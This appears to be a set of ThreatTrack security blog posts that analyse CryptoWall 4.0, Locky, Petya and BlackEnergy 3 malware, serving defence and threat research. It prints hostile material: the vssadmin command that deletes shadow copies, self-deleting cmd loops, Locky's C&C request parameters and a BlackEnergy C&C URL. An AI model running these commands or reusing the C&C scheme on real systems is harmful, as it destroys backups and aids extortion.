ACT I: Setting the Stage

Communication is the most common tool in any business today. CryptoWall authors have been scraping the Internet for any published company email addresses (usually available via marketing sites) to use as the entry point of the attack. These sourced email addresses are then blasted with phishing emails. These phishing emails are crafted in a way that makes the receiver think it’s an important email and should be read and understood properly. They usually contain a link to a direct download or a file attachment of CryptoWall – unbeknownst to the user. The encryption starts when the user clicks.

Here is the sample of a ransomware-laced email disguised as a booking.com email:

Booking.com email example

Booking.com email example

ACT II: The Latest CryptoWall 4.0 Disassembled

CryptoWall  4.0

Md5: e73806e3f41f61e7c7a364625cd58f65

On the initial infection, the sample resolves the addresses of all the API functions that it needs to call later. This is done by means of a list of hashes, one for the name of every API call. This way the malware does not have to use an import table or store API names directly as strings.

Next, the malware gathers the following system information:

  • ComputerName
  • UserName
  • SystemDrive serial number
  • CPU INFO (using PROCESSOR_IDENTIFIER)
  • Number of CPUs (using PROCESSOR_Level)
  • Revision Number of CPU (using PROCESSOR_REVISION)
  • OS Major version
  • OS Minor version
  • IsWow64
  • Keyboard Layout

Among the loaded modules are DLLs related to Windows Crypto API (CRYPTSP), Windows 7 Enhanced Cryptographic Provider (RSAENH). This suggests that the malware is going to perform some cryptographic operations.

Figure 2

 

It will create the md5 hash of the victims PC using the above system information by using the following API sequence:

  • CryptAcquireContext
  • CryptCreateHash ; Algorithm ID = CALG_MD5 0x00008003, hash key: nonkeyed algorithm (0)
  • CryptHashData
  • CryptGetHashParam

Example:

Example 1

Example 2

Example 3

The malware will inject code in a newly spawned child process – Explorer.exe – using the following APIs:

  • ZwCreateSection
  • ZwMapViewOfSection
  • ZwAllocateVirtualMemory
  • ZwWriteVirtualMemory
  • ZwProtectVirtualMemory
  • ZwQueueApcThread
  • ZwResumeThread

It will create a copy of the original file in the %APPDATA% folder and create AutoStart Registry entry.

The injected code will be responsible for disabling system protection, as well as deleting all the system shadow copy and injecting code in a newly spawned process, svchost.exe.

Deleting shadow copies

Deleting shadow copies, allowing the malware to disable file recovery services.

 AV Limitations:

– Emulation TimeOut

Disable system restore

Disable system restore

Execution continues in the svchost.exe process.  This process formulates the commands needed to communicate with the C&C server. It will also gather the above system information and generate an md5 hash of the victims PC that will be used in communicating with the C&C server.

Some of the C&C servers:

C&C servers

C&C servers

The network communication is using HTTP, but with an encrypted payload. It will try to establish a connection in one of the following I2P proxy through I2P URLs. Once it succeeds, it will send a POST request with the encoded string request.

Figure 3

CryptoWall stores the following information inside a configuration file:

  • Received public key binary data
  • TXT
  • HTML
  • PNG

The last three files will be written in each folder of the victim’s system after the file-encryption process.

  • Normal file behavior
  • Payload after multiple layers of encryption

ACT III: “It’s like I left my keys inside my car”

If you’ve ever locked your keys inside your car, you know how irritating it feels. You know where they are, but you can’t do anything about it and you have to pay a locksmith to open it for you – or get real crafty with a wire coat hanger. Ransomware is a lot like that: Your most precious information and data has been held for ransom, and there is a chance that it could be released to the public – and you have no way to stop it.

HELP_YOUR_FILES.HTML

HELP_YOUR_FILES.HTML

Once CryptoWall has finished encrypting your files, it will launch the ransom notes that explain what happened and how to purchase the decrypter.

For an even deeper dive into CryptoWall, check out our analysis of CryptoWall 4 here.

ACT IV: Finding Solutions to Guard Against Ransomware

The bright spot in all this is that, if you can see the trend of the infection, there are lots of points where we can actually stop CryptoWall.

The first stop is via email. Advanced email defense solutions designed to catch malware that evades traditional defenses is a great tool to help stop attacks by detecting phishing links and exploits that deliver ransomware. That can stop CryptoWall from encrypting and taking the data from you.

The next defense is bolstering your network. Adding an advanced defense solution that identifies and correlates discovered threats with anomalous network activity is an invaluable tool to guard your data. ThreatTrack’s ThreatSecure Network, for instance, provides end-to-end network visibility and real-time detection to catch traffic hitting known malicious IPs associated with ransomware distribution and C&C.

The post The Day the Earth Stood Still for CryptoWall appeared first on ThreatTrack Security Labs Blog.

Understanding the Latest Version of Locky Ransomware

It is one of the most prevalent spam malware in the wild today: Locky ransomware. The Locky malware authors started their campaign last year but didn’t become very active until January 2016 – and they haven’t slowed down since.

Locky e-mails usually come in with an attached zip archive and once extracted may contain a document or JavaScript. The Locky ransomware we discovered included a JavaScript that will potentially download and run an executable. The executable is the focal point of this analysis and the latest version of the Locky ransomware.

Locky spam email

The spam email sent by the malware authors.


Basic Infection Flow and File Hashes:

  • 1582A0B6A04854C39F8392B061C52A7A – The .zip attachment
  • 59D2E5827F0EFFE7569B2DAE633AFD1F – The JavaScript extracted from the .zip
  • F79C950FA3EFC3BB29A4F15AE05448F2The Locky executable downloaded by the Javascript
Basic infection and file hashes

Basic infection and file hashes

Indications of Compromise:

It is fairly easy to find out if a machine is infected by Locky. The image below shows the desktop background of a compromised Windows XP machine.

Desktop of a Locky-infected computer

Desktop of a Locky-infected computer

 

The files that have been encrypted by the ransomware are named with the extension “.locky” and their names start with the personal ID for the infected user – in this case “8B74B4AA40D51F4A,” an MD5 hash. There is also a text file named “_HELP_instructions.txt” that contains the same message displayed in the desktop background.

Locky files

Locky files

Locky creates an encrypted user-specific registry key at HKCU\Software. The details about the registry values will be discussed later on in this post. The key created was “8W21gQe9WZ3tc.

 

Encrypted user-specific key

Encrypted user-specific key

 

Payment Instructions

The user is instructed to install TOR browser to access the payment webpage – shown below. The victim must have a bitcoin wallet to send 1.5 bitcoin to the specified bitcoin address.

Payment page for Locky ransomware

Payment page for Locky ransomware 

A Look at the JavaScript 59D2E5827F0EFFE7569B2DAE633AFD1F

The JavaScript is straightforward. The following lines are visible once opened in a text editor:

JavaScript 1

JavaScript 1

The Javascript downloads via GET command from http://goldish[dot]dk/o2pds and executes it in %Temp%. The executable will not run properly if not located in a %Temp% folder.

In-Depth Analysis of the Executable F79C950FA3EFC3BB29A4F15AE05448F2

Just like other malware families such as Upatre, Dridex and Crypto, the real Locky executable is wrapped by some encryption routines to avoid signature-based detections. The last step of the unwrapping process is to decompress the executable by using RTLDecompressBuffer API. We’ve seen this same method before from Upatre and Necurs rootkit downloaders.

RTLDecompressBuffer API

RTLDecompressBuffer API

 

The MD5 of the unwrapped Locky executable analyzed is F35D01F835FC637E0D9E66CD7E571C06.

The first step of the executable is to decrypt the following CnC Server IP addresses.

CnC Server IP addresses

CnC Server IP addresses

 

The executable retrieves the Windows directory by the API GetWindowsDirectoryA. Then it will be used as a parameter for the API GetVolumeNameForVolumeMountPointA. This Function retrieves the volume GUID path associated with the machine’s Windows folder.

Windows directory

Windows directory 

This GUID will serve as the initial basis of the Locky ransomware for the unique ID of the user.

First, GUID be used by the executable for the API CryptHashData.

API CryptHashData

API CryptHashData

For The executable to obtain the unique ID – “8B74B4AA40D51F4A” – for the machine, it will use the API CryptGetHashParam to get the unique ID associated with the GUID. It is visible at the first 8 Bytes at the hex dump.

API CryptGetHashParam

API CryptGetHashParam

 

This unique ID is correlated with the new registry key of this version of Locky. The ID will be converted by a checksum to string routine implemented by the executable to obtain a string that will be used as its registry key.

For this new version, these particular set of instructions explain why the new registry key is “8W21gQe9WZ3tc” instead of “Locky,” used before in the older versions.

New registry key

New registry key 

CnC Communication

The Locky executable sends a “POST” request to “http://<IP/Domain>/submit.php” by the following commands and parameters:

Commands Parameters (Remove the <>)
&act=getkey&affid= id=<>,&lang=<>,&corp=<>,&serv=<>,&os=<>,&sp=<>,&x64=<>
&act=gettext&lang= id=<>
&act=stats&path= id=<>,&encrypted=<>,&failed=<>,&length=<>

An example of parameters for Command &act=getkey&affid=: (Not Encrypted Form)

id=8B74B4AA40D51F4A&act=getkey&affid=1&lang=en&corp=0&serv=0&os=Windows+XP&sp=3&x64=0

These commands will be sent to the CnC server in encrypted form via the API HttpSendRequestA. The executable also receives an encrypted reply via the API InternetReadFile.

CnC server commands

CnC server commands

 

After sending the getkey command to the CnC, the executable will decrypt the encrypted message and getkey command it received the public RSA key. The image below shows a part of the decryption routine. The public RSA key is at the ASCII dump.

Decryption routine

Decryption routine 

Saving The Public Key in the User’s Machine

The executable will encrypt the public RSA key and its checksum will be converted to a string equivalent – just like how the registry key was created. It will be stored as a binary value in its registry key at HKCU\Software. The value name is “270CwQa9XuPIc7.”

Encrypting public RSA key

Encrypting public RSA key

A Message to the User

Then it will send the CnC command “&act=gettext&lang=.” This will retrieve the Locky ransomware message equivalent to the desktop background image.

Locky ransomware message

Locky ransomware message

 

Once again, just like the public RSA key, this message will be encrypted, stored to a binary value in the HKCU\software registry key created by the executable. The message is equivalent to the registry value “7CaY397p5R.”

Gathering the Drives, Network Resources and Files to Encrypt

Network Shares and Resources:

The executable used a routine consisting of APIs WNetOpenEnumW, WNetEnumResourcesW, WNetAddConnection2 and WNetCloseEnum to parse through these three types of resources:

  • #define RESOURCE_CONNECTED 1
  • #define RESOURCE_GLOBALNET 2
  • #define RESOURCE_REMEMBERED 3

The usage of NetResource Parsing Routine for different types of resources:

NetResource Parsing Routine

NetResource Parsing Routine

Upon enabling a shared folder for the machine under analysis, the image shows that the executable will connect to the shared folder so it can encrypt the files in the shared folder later on.

Encrypting files in the shared folder

Encrypting files in the shared folder

The executable then uses the APIs GetLogicalDrives and GetDriveTypeW to gather the possible drives to encrypt. In this case, it obtained the “C:\” drive.

Encrypting the C:/ drive

Encrypting the C:/ drive 

The last step is to spawn the thread that will encrypt the files per folder in the drives and resources that were gathered.

Final step in the Locky ransomware process

Final step in the Locky ransomware process

 

Deleting the Shadow Copies to Prevent Data Restoration

The next step for the executable is to delete the shadow copies by running this command:

“vssadmin.exe Delete Shadows /All /Quiet”

Other Ransomwares, including Crypto, has used this same command.

The File Encryption Process – the Thread Spawned

The first step in this phase is to parse the directories and files of the machine. The executable allocates a memory space as a structured reference for the files to be encrypted.

White List Check

While parsing the directories of the machine, it will check the file name of each file against the following set of white list strings. File names that have one of the “ff.” strings will not be encrypted.

  • @_HELP_instructions.bmp, _HELP_instructions.txt, _Locky_recover_instructions.bmp, _Locky_recover_instructions.txt, tmp, winnt, Application Data, AppData, Program Files (x86), Program Files, temp, thumbs.db, $Recycle.Bin, System Volume Information, Boot, Windows

Black List Check

The Locky executable also checks the extension of the file to be encrypted. If the file has one of the “ff.” extensions, it will be encrypted.

  • .001, .002, .003, .004, .005, .006, .007, .008, .009, .010, .011, .123, .3dm, .3ds, .3g2, .3gp, .602, .7z, .ARC, .CSV, .DOC, .DOT, .MYD, .MYI, .NEF, .PAQ, .PPT, .RTF, .SQLITE3, .SQLITEDB, .XLS, .aes, .asc, .asf, .asm, .asp, .avi, .bak, .bat, .bmp, .brd, .cgm, .class, .cmd, .cpp, .crt, .cs, .csr, .db, .dbf, .dch, .dif, .dip, .djv, .djvu, .docb, .docm, .docx, .dotm, .dotx, .fla, .flv, .frm, .gif, .gpg, .gz, .hwp, .ibd, .jar, .java, .jpeg, .jpg, .js, .key, .lay, .lay6, .ldf, .m3u, .m4u, .max, .mdb, .mdf, .mid, .mkv, .mml, .mov, .mp3, .mp4, .mpeg, .mpg, .ms11, .ms11 (Security copy), .n64, .odb, .odg, .odp, .ods, .odt, .onetoc2, .otg, .otp, .ots, .ott, .p12, .pas, .pdf, .pem, .php, .pl, .png, .pot, .potm, .potx, .ppam, .pps, .ppsm, .ppsx, .pptm, .pptx, .psd, .pst, .qcow2, .rar, .raw, .rb, .sch, .sh, .sldm, .sldx, .slk, .sql, .stc, .std, .sti, .stw, .svg, .swf, .sxc, .sxd, .sxi, .sxm, .sxw, .tar, .tar.bz2, .tbk, .tgz, .tif, .tiff, .txt, .uop, .uot, .vb, .vbs, .vdi, .vmdk, .vmx, .vob, .wav, .wb2, .wk1, .wks, .wma, .wmv, .xlc, .xlm, .xlsb, .xlsm, .xlsx, .xlt, .xltm, .xltx, .xlw, .xml, .zip, wallet.dat (filename specific)

API and Function-Level Overview of the File Encryption Process:

The Locky ransomware’s claim that it uses AES and RSA is basically true. It used Crypto APIs during the encryption process, including CryptGenRandom and CryptEncrypt. It also had two functions in this process that used the instructions “aesenc” and “aeskeygenassisst.

API overview

API overview

Dissecting the Last 0x344 Bytes of an Encrypted Locky File

In the image below, the last 0x344 bytes are being written at the end of file. The first four bytes are hard coded by the executable. We believe this is some sort of an identifier for the Locky ransomware authors for the version that encrypted the user’s files.

Hard-coded 0x8956FE93

Hard-coded 0x8956FE93

 

Writing to the file

Writing to the file 

The Next 0x10 bytes are obviously the unique ID of the user. The next 0x100 bytes are the output of the CryptEncrypt API. The last 0x230 bytes are from the AESENC function mentioned from the encryption flow before.

Finalizing the Infection

The executable will generate the “_HELP_instructions.txt” file for every folder path where it encrypted a file. It will also generate an equivalent Bitmap image for the instructions and store it so it becomes the user’s desktop background.

The executable will then send another actioncalled “stats” – to the CnC server:                  id=8B74B4AA40D51F4A&act=stats&path=c%3A&encrypted=1&failed=0&length=5912

Path = the infected Drive “C:\”

Encrypted = True

Failed = false

Length = number of files

The last step is to create the last encrypted registry value. It is equivalent to the previous version “Completed = Yes.” This completes the details about the three encrypted registry values.

Last step of the encryption process

Last step of the encryption process

 

The analyzed executable also had the domain generation algorithm, which has been known to exist for the Locky ransomware since its existence last year. It will be used by the executable if it cannot receive a response from the initially decrypted IP addresses.

How to Mitigate

Using ThreatSecure products, it is possible to block the ransomware executable from downloading. The image below shows ThreatSecure Network detecting the malicious download via the GET procedure.

 

ThreatSecure in action

ThreatSecure in action 

Prior to opening an e-mail attachment, the customer can use ThreatTrack’s dynamic malware analysis sandbox product – ThreatAnalyzer – to determine if the file is malicious. ThreatAnalyzer logs its output in a file named “analysis.xml.” By looking at this output, you can tell it has seen the executable’s ransomware behaviors (IoCs).

Stored and Encrypted Files to .locky:

The sandbox detects that the files were encrypted, and the “Help Instructions” text file was also generated.

Help instructions text file

Help instructions text file 

Network capture of Communication to CnC via post command to the CnC Server IP:

An outgoing connection is being initiated by Locky.

Network capture of communication to CnC

Network capture of communication to CnC

 

Process capture of Vssadmin.exe execution, deleting all backups:

Process capture of Vssadmin.exe execution

Process capture of Vssadmin.exe execution

Setting an encrypted registry value “4Y0743Ngl” at HKCU\software:

Prior to file encryption, Locky enumerates the network resources of the machine, which can also be encrypted. ThreatAnalyzer was also able to see this behavior:

Locky enumerating network resources

Locky enumerating network resources

 

As shown here, advanced threat defense products like those used here help avoid ransomware infection. The advanced solutions catch the emerging threat before it can do any damage.

What’s more, the sandbox capabilities of ThreatAnalyzer also showed that it can log indications of compromise and potential malicious activities once a user accidentally opens the attachment – one more way users are guarded against increasingly popular ransomware attacks.

The post Understanding the Latest Version of Locky Ransomware appeared first on ThreatTrack Security Labs Blog.

A Glimpse at Petya Ransomware

Ransomware has become an increasingly serious threat. Cryptowall, TeslasCrypt and Locky are just some of the ransomware variants that infected large numbers of victims. Petya is the newest strain and the most devious among them.

Petya will not only encrypt files but it will make the system completely useless, leaving the victim no choice but to pay for the ransom, and it will encrypt filesystem’s Master File Table, which leaves the operating system unable to load. MFT is an essential file in NTFS file system. It contains every file record and directory on NTFS logical volume. Each record contains all the particulars that the operating system need to boot properly.

Like any other malware, Petya is widely distributed via a job application spear-phishing email that comes with a Dropbox link luring the victim by claiming the link contains self-extracting CV; in fact, it contains self-extracting executable that would later unleash its malicious behavior.

Petya dropper

Petya’s dropper

Petya's infection behavior

Petya’s infection behavior

 Petya ransomware has two infection stages. The first stage is MBR infection and encryption key generation, including the decryption code used in ransom messages. The second stage is MFT encryption.

First Stage of Encryption

First infection stage behavior

First infection stage behavior

An MBR infection is made through straightforward \\.\PhysicalDrive0 manipulation with the help of DeviceIOControl API. It first retrieves the physical location of the root drive \\.\c by sending IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS control code to the device driver.  Then it sends the extended disk partition info of \\.\PhysicalDrive0 through IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS control code.

GET_VOLUME_Data

The dropper will encrypt the original MBR using XOR opcode and 0x37 and save it for later use. It will also create 34 disk sectors containing 0x37. Right after the 34 sectors are Petya’s MFT infecting code. Located on Sector 56 is the original encrypted MBR.

Infected disk view

Infected disk view

Infected disk view

Infected disk view

Original Encrypted MBR

Original Encrypted MBR

After the MBR infection, it will intentionally crash the system by triggering NTRaiseHardError. This will trigger BSOD and the system will start, which will cause the machine to load using the infected MBR.

Code snippet triggering BSOD

Code snippet in triggering BSOD

BSOD

BSOD

Once we inspected the dumped image of the disk, we discovered it was showing a fake CHKDSK screen. We will also see the ransom message and ASCII skull art.

Dumped disk image

Dumped disk image

Second Infection Stage

The stage 2 infection code is written in 16-bit architecture, which uses BIOS interrupt calls.

Upon system boot up, it will load into memory Petya’s malicious code, which is located at sector 34. It will first determine if the system is already infected by checking the first byte at sector is 0x0. If not infected, it will display fake CHKDSK.

Fake CHKDSK

Fake CHKDSK

When someone sees the Figure 8, it means that the MFT table is already encrypted using salsa20 algorithm.

Figure 8

The victim will see this screen upon boot.

The victim will see this screen upon boot.

Ransom message and instructions

Ransom message and instructions

Petya Ransomware Page

The webpage for the victim to access their personal decryption key is protected against bots and contains information about when the Petya ransomware project was launched, warnings on what not to do when recovering files and an FAQ page. The page is surprisingly very user friendly and shows the days left before the ransom price will be doubled.

Ransom page captcha

Ransom page captcha

 Petya’s homepage

Petya’s homepage

It also contains news feeds, including different blogs and news from AV companies warning about Petya.

News 1 Figure 13

News 2

They also provide a step-by-step process on how to pay the ransom, including instructions on how to purchase bitcoin. Support via web is included too in case the victim encounters problems in the transaction they’ve made. Petya’s ransom is a lot cheaper compared to other ransomware, too.

Petya web page 1

Petya web page 2

Petya web page 3

Petya web page 4

On Step 4 of the payment procedure, the “next” button is disabled until they’ve confirmed that they already received the payment.

Petya support page

Petya’s support page

Below is a shot of ThreatTrack’s ThreatSecure Network dashboard catching Petya. Tools like ThreatSecure can detect and disrupt attacks in real time.

ThreatSecure Network catching Petya ransomware

ThreatSecure Network catching Petya ransomware

 

The post A Glimpse at Petya Ransomware appeared first on ThreatTrack Security Labs Blog.

Breaking Down the Malware Behind the Ukraine Power Outage

Security researchers recently discovered that the power outage in the Ukraine in December was caused by a malware and identified as an evolved version of BlackEnergy. This Trojan, dating back to 2007, was a popular malware that was previously sold in Russian underground sites. However, its design and architecture changed from performing simple HTTP DDos attacks to modular functional strategy implementation. The latest version of this Trojan is now capable of dropping rootkits, performing stealthy approaches and backdoor commands via a CnC server. It is also worth noting that it is highly speculated to be utilized by a group of attackers that are against the government of Ukraine. Since Stuxnet, this BlackEnergy cyberattack is another of its kind since it also managed to sabotage an industrial sector and that the group responsible for the power outage was also linked to the Trojan found in the mining and railway sector of Ukraine.

Industrial systems typically electrical, power, oil or water uses Industrial Control Systems (ICS), which are used for control, supervision and data collection. Usually, the ICS are on an isolated network and, although still part of the network, rarely have limited access to the internet. It is interesting how BlackEnergy managed to get inside these systems. Later during our analysis, we will gain insight on what happened and how the group managed to infiltrate the network from the initial stage of the attack via a phishing email.

This blog will focus on the analysis of BlackEnergy, parts of its core components, as well as how ThreatTrack’s ThreatAnalyzer and ThreatSecure provide us the information needed for data intelligence gathering. We’ll leave the analysis of the plugins that BlackEnergy utilized for another separate blog.

This research also aims to provide information on (1) how to emulate the attack by dissecting each stage of the process and (2) show how to utilize ThreatTrack’s newest line of threat identification products to mitigate and lessen the probability that these types of outbreaks might happen to you or your company. We’ll begin the analysis using the two samples that we have.

Md5: 97b7577d13cf5e3bf39cbe6d3f0a7732

  • Type: XLS (Microsoft Excel file)
  • First seen: 8/16/2015

Md5: e15b36c2e394d599a8ab352159089dd2

  • Type: DOC (Microsoft Document file)
  • First seen: 1/22/2016

BlackEnergy’s method of arrival is via a spear-phishing email containing a malicious attachment. We can emulate this by attaching the samples that we have on an email and send it inside our network. There has been a lot of debate as to how the attachment(s) was/were executed since, for this version of BlackEnergy, no exploits of Office have been seen. The only thing we know is that somehow a person inside executed the document file(s), whether by social engineering or an insider.

Using ThreatTrack’s ThreatSecure Network and ThreatSecure Email, we can see that it was identified as something malicious when entering the network and also via email. The system changes that it will be performing can be seen under behaviors. The IP entry indicates the IP address of a remote server that it is trying to beacon to. Since this sample is already a few months old, and news of this attack has already been widespread, it only makes sense that the server is already down.

TSN_Excel

Fig 1: TSN catching the XLS attachment

docTSN_identified

Fig 2: TSN catching the DOC file

tse_unreviewed

Fig 2.1: ThreatSecure Email (TSE)

tse_details

Fig 2.2: Submit for Remediation

A cool feature of ThreatSecure Network is that, once a threat has been identified, any connection made to the target computer will be monitored and can be seen in the ThreatSecure Network UI  called ThressionsTM. Using these Thressions, users will be alerted that an attack is happening or has happened and, depending on their settings, will be able to block a said network session. Fig 2.1 and Fig 2.2 above show that the file we are analyzing was caught by ThreatSecure Email, and upon user’s request can be submitted for remediation to remove the system changes done by the malware.

It is a good practice to find out what the malware does in overview prior to getting deep in the assembly breakdown. There are a couple of ways we can do this. You can use an infected machine and the tools available on the net to see what the malware does upon execution. But this would take time and effort to set up, and there’s a much faster and easier way we can do this: Use a sandbox.

ThreatTrack’s dynamic malware analysis sandbox ThreatAnalyzer reveals the behaviors not normally seen on normal programs.

We started with the DOC file (e15b36c2e394d599a8ab352159089dd2) and the XLS (97b7577d13cf5e3bf39cbe6d3f0a7732), and both showed the same behavior:

  • Dropped the following files
    • %Temp%\vba_macro.exe
    • LNK file (windows shortcut) pointing to the DOC file
    • %Application Data%\FONTCACHE.DAT
    • %User%\NTUSER.LOG
    • %Common Startup%\<adapter name>.LNK file
  • Creates a named pipe
    • Pipe\{AA0EED25-4167-4CBB-BDA8-9A0F5FF93EA8}
  • Executed the following processes, some of the spawned multiple times
    • Vba_macro.exe
    • Cmd.exe
    • Attrib.exe
    • Ping.exe
    • Rundll32.exe %Application Data%\FONTCACHE.DAT, #1
    • %Program Files%\iexplore.exe
  • A screenshot showing what the document looks like when opened (DOC and XLS)
  • Created/Modified the following registry
    • Software\Microsoft\Internet Explorer\Main Check_Associations
    • Software\Microsoft\Internet Explorer\InformationBar FirstTime
    • Software\Microsoft\Internet Explorer\New Windows PopupMgr
    • Software\Microsoft\Internet Explorer\PhishingFilter Enabled
    • Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache Persistent
    • Software\Microsoft\Internet Explorer\TabbedBrowsing WarnOnClose
    • Software\Microsoft\Internet Explorer\TabbedBrowsing WarnOnCloseAdvanced
    • Software\Microsoft\Internet Explorer\Main DisableFirstRunCustomize
    • Software\Microsoft\Internet Explorer\Recovery NoReopenLastSession
    • Software\Microsoft\Internet Explorer\Main NoProtectedModeBanner
    • Software\Microsoft\Internet Explorer\TabbedBrowsing
    • Software\Microsoft\Internet Explorer\Recovery
  • Attempted to connect to a remote server
    • 5.149..254.114
    • Usage of RPCRT4.DLL
TA_processes

Fig 2.3: ThreatAnalyzer showing processes spawned by the DOC file

Looking a bit deeper

Now that we have an overview of what the samples are doing, we’ll do some classic reverse-engineering.

Although the two samples have different hashes and file formats (the one is a word document file and the other an excel sheet) they are, in basic sense, the same.

Both have a malicious macro script embedded in them and both are trying to deceive the user from disabling the macro security settings that is enabled by default. A fake Microsoft Office message appears in Russian, stating “This document was created by a newer version of Microsoft office. Macros must be enabled to display the content of the document.”

Depending on the security settings of Microsoft Office (high, medium or low), the image on Fig 4 will be displayed. If a user somehow chose to disable the macro security or is on a low security level, the malicious scripts previously mentioned will be executed immediately.

security_macro

Fig 3: Security on medium settings

Looking inside the VB macro, the code are fairly straightforward:

  • Declares a series of byte array
  • Save it in a file located in the %TEMP% directory
  • Execute the said file using the function SHELL
Fig 4

Fig 4: Byte array declaration (MZ)

 

Fig 5: Byte array declaration (PE)

Fig 5: Byte array declaration (PE)

Fig 4 shows the value 77, 90 in array a (1). Converted to hex, that is 0x4D, 0x5A (MZ), which is a strong indicator that these sequence of array is an executable. This is further verified in Fig 6, where we see 80, 69 that, when converted to hex, results in 0x50, 0x45 (PE).

Automatic execution is achieved by doing the following:

Fig 6: Byte array declaration (PE)

Fig 6: Byte array declaration (PE)

Fig 7. Deobfuscated macro

To put it simply, Fig 7 tells us that it will save the byte array into a file named vba_macro.exe located in %TEMP% directory and execute it using the Shell function.

Vba_macro.exe

According to the results from ThreatAnalyzer, Vba_macro.exe will spawn a file named FONTCACHE.DAT and several other processes. Looking inside the vba_macro executable, it seems it is heavily obfuscated at its entry point. It is posing as a file with an original name of packet.dll and is exposing several functions similar to that of being used by WinPCap. The weird thing is that although the function names are similar to that of a legit packet.dll located at the system directory (assuming WinPCap is installed), the assembled code is garbage, except for the first function, which is probably the deobfuscator code.

packet_dll_comparison

Fig 8: Note the similarities and the difference between the two.

The primary purpose of this file is to stage the next part of the infection process, which is to execute FONTCACHE.DAT.

Upon execution, this file reconstructs its code in an allocated part of memory and writes parts of itself in a separate file, the FONTCACHE.DAT, in the Application data folder. The GetAdaptersInfo API is used to get the name of the network card in use, use that as a file name for the .LNK, which is a windows shortcut file that will execute another program indicated on its path. On this case, it uses this method to ensure that the program it points to %windir%\System32\rundll32.exe “C:\Documents and Settings\Administrator\Local Settings\Application Data\FONTCACHE.DAT” will always get started upon boot up.

It deletes the credential named MCSF_Config before executing FONTCACHE.DAT using rundll32 with #1, indicating to execute the first ordinal function. This version of BlackEnergy uses the said credential to store its configuration, and in order to ensure that it will have the latest config, it deletes it prior to executing FONTCACHE.DAT.

creddelete_shellexecute

Fig 9: CredDeleteA and ShellExecute

It will call the following command line shell commands

cmd /s /c “for /L %i in (1,1,100) do (del /F “%TEMP%\vba_macro.exe” & ping localhost -n 2 & if not exist “%Application Data%\FONTCACHE.DAT” Exit 1)

cmd /s /c “for /L %i in (1,1,100) do (attrib +h “%TEMP%\vba_macro.exe” & del /A:h /F “%TEMP%\vba_macro.exe” & ping localhost -n 2 & if not exist “%Application Data%\FONTCACHE.DAT” Exit 1)

FONTCACHE.DAT

Fontcache.dat is executed using rundll32, a way for Windows to run compiled libraries. It has an argument of #1, which means to run the first ordinal in its exported functions.

In an attempt to make a researcher’s life more difficult and in order to slow down the time to fully analyze the malware, the authors decided to obfuscate, again, this piece of malware.

We’ll get a bit deeper by trying to unpack the malware using old methods. It is common knowledge for malware analysts to set a break point to common memory allocating APIs, such as VirtualAlloc and LocalAlloc, and see whether the malware is trying to unpack part of itself in memory; however, this particular sample uses RtlAlloc and HeapAlloc to copy parts of itself little by little.

After decryption and some initializations, it will enter its main loop.

mainloop_flow_letters

Fig 10: Chart of main function of FONTCACHE.DAT

(A) Attempts to read the current user’s credential named MCSF_Config using CredReadA API. The one that will be read is actually an encrypted buffer that will be written by the malware in function (B). This encrypted buffer will be decrypted twice and will contain information like the CnC server URL, bot version, build type and some other strings that will be appended to locally gathered data.

decrypted_configuration

(B) Reads the data in the .CDATA section of FONTCACHE.DAT and overwrites the current user’s credential with that blob. This is achieved via CredWriteA API. This part also gathers local information about the target system and saves it for later use.

(C) Responsible for modifying the settings for Internet Explorer in the registry.

    • Software\Microsoft\Internet Explorer\Main Check_Associations
    • Software\Microsoft\Internet Explorer\InformationBar FirstTime
    • Software\Microsoft\Internet Explorer\New Windows PopupMgr
    • Software\Microsoft\Internet Explorer\PhishingFilter Enabled
    • Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache Persistent
    • Software\Microsoft\Internet Explorer\TabbedBrowsing WarnOnClose
    • Software\Microsoft\Internet Explorer\TabbedBrowsing WarnOnCloseAdvanced
    • Software\Microsoft\Internet Explorer\Main DisableFirstRunCustomize
    • Software\Microsoft\Internet Explorer\Recovery NoReopenLastSession
    • Software\Microsoft\Internet Explorer\Main NoProtectedModeBanner
    • Software\Microsoft\Internet Explorer\TabbedBrowsing
    • Software\Microsoft\Internet Explorer\Recovery

The function also creates a separate thread that initiates the RPC communication over named pipes. The mentioned named pipe is the method of communication of different BE 3 plugins over the same network.

      1. Pipe\{AA0EED25-4167-4CBB-BDA8-9A0F5FF93EA8}

(D) Creates a file named NTUSER.LOG. Currently, due to the way it was programmed, it only creates a 0 byte file.

(E) Forms the message that will be sent over to its CnC server. It contains the following information:

      • B_id : BotID, comprises of <computername> _<unique bot identifier>
      • B_gen : generation of bot, on this case “release”
      • B_ver : Bot version, “2.2”
      • Os_v : target system OS version, “2600” (Build version of Windows XP)
      • Os_type: OS type, “0”

Using CryptBinaryToString, it “encrypts” the data that will be sent over the network and sent to its CnC server as POST data as the body parameter

post_data

(F) Creates an instance of Internet Explorer in the background using CoCreateInstance API. Since the settings of IE were already modified, no GUI will be seen, and it will be running under svchost.exe.

  • D30C1661-CDAF-11D0-8A3E-00C04FC9E26E using this GUID, an empty instance of IE will be called as it is the default handler of IWebBrowser2 interface.
  • Connects to http://5.149.254.114/Microsoft/Update/KC074913.php as an RPC client to send the information to a remote server.

rpc_cnc_connection

(G) Assuming a connection to the remote server has been made, it accepts 4 basic commands:

  • Delete – deletes a specified file
  • Ldplg – loads a plugin
  • Unlplg – unload a plugin
  • Dexec – download and execute a binary file

Using this, it has made itself modular as it can download and execute different plugin based on what type of attack will be performed. BlackEnergy has already been linked to several found plugins that also uses the named pipe mentioned above as inter-process communication, locally or even over the local network.

It is believed that these backdoor commands are the ones responsible for the attack that happened. The authors would upload new plugins, execute them and, after the damage has been done, delete the traces. These are (but not limited to):

      • Input/Output (IO) operations, deleting files and wiping away traces
      • Gathering system information
      • Keyloggers
      • Password stealers
      • Taking of screenshots
      • Remote access, SSH or RDP

After which, it will sleep for X number of seconds, depending on the one indicated on its configuration data and attempt to send the information and accept new commands from the CnC server.

Summary

overall_flow

Fig 11: Simplified overall flow of BlackEnergy 3

Point of entry is using a targeted spear-phishing email with a malicious attachment. Once it has been executed, the malware would be able to download and install new plugins. Communication between the core malware module and plugins are achieved through RPC communication. This is employed since most ICS are on an isolated network. Even if the target systems are on a network that does not have internet connection, the malware would still be able to ex-filtrate the data, install new plugins and control the systems using RPC named pipes over SMB. Simplified diagram on Fig 11.

The post Breaking Down the Malware Behind the Ukraine Power Outage appeared first on ThreatTrack Security Labs Blog.

What’s New with Dridex

